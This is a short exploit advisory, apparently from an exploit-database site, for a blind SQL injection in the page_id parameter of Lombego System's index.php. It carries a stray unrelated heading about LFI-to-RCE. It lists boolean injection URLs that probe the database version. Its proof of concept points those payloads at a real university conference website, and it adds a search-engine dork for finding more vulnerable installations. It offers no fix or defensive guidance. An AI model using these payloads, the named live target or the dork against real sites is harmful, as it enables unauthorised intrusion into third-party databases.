LFI to RCE via access_log injection

Lombego System Blind SQL Injection Vuln


[o] Lombego System Blind SQL Injection Vulnerability
Software : Lombego System
Vendor : http://www.lombego.de/
Author : NoGe

[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?page_id=[SQL]
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=5


[o] Proof of Concept
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=4
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=5


[o] Dork
"powered by Lombego Systems"


[o] Notes
this is an private sript and some target are in one host.


Comments